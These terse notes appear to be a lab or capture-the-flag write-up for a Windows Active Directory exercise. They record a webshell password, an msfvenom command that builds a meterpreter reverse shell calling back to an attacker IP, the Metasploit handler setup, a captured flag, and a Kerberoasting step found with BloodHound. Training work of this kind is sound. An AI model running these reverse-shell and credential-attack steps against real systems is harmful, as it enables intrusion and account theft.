Writeup P1

admin:My_W3bsH3ll_P@ssw0rd!

/uploads

msfvenom -p windows/meterpreter/reverse_tcp --format exe LHOST=10.10.17.50 -o payload.exe

Then use exploit/multi/handler, payload windows/meterpreter/reverse_tcp

Run meterpreter using upload provided by webshell

→ JusT_g3tt1ng_st@rt3d!

Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

With Bloodhound, the account is:

[email protected]

setuserspn.exe doesn’t work (powershell errors)